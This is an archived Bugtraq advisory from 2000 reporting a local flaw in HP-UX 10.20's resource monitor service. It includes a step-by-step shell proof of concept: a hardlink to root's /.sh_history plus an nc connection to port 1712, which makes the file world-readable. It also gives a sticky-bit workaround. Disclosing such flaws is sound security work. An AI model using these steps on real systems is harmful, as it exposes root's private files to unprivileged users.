[17554] in bugtraq

home help back first fref pref prev next nref lref last post

HP-UX 10.20 resource monitor service

daemon@ATHENA.MIT.EDU (J.A. Gutierrez)
Wed Nov 8 13:06:09 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id:  <200011080851.KAA05777@gtc1.cps.unizar.es>
Date:         Wed, 8 Nov 2000 10:51:28 +0200
Reply-To: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@SECURITYFOCUS.COM

    Problem: on HP-UX 10.20 you can change any file on the root
    partition to mode 644:

    $ uname -sr
    HP-UX B.10.20
    $ cd /etc/opt/resmon/log
    $ mv registrar.log registrar.log.orig
    $ ls -l /.sh_history
    -rw-------   1 root       sys           3316 Sep 20 15:22 /.sh_history
    $ ln /.sh_history registrar.log
    $ nc hpux.example.com 1712 < /etc/motd
    $ ls -l /.sh_history
    -rw-r--r--   2 root       sys           3605 Nov  8 09:45 /.sh_history
    $ rm -f registrar.log
    $ mv registrar.log.orig registrar.log

    So, /.sh_history becomes world readable, and text similar to

-------------------Start Event--------------------
Event 382 occurred at Wed Nov  8 09:45:28.818524 2000
Process ID: 10931 (/etc/opt/resmon/lbin/registrar)   Log Level: Error
_rm_recv: Couldn't malloc 1073803312 bytes for receive buffer
-------------------End Event----------------------

    gets appended to it.


    It seems it's fixed on HP-UX 11, so I guess there is already
    a patch for 10.20


    Workaround: chmod +t /etc/opt/resmon/log should work.


--
finger spd@gtc1.cps.unizar.es for PGP       /              So be easy and free
.mailcap tip of the day:                   /      when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null       /            (the pogues)
home help back first fref pref prev next nref lref last post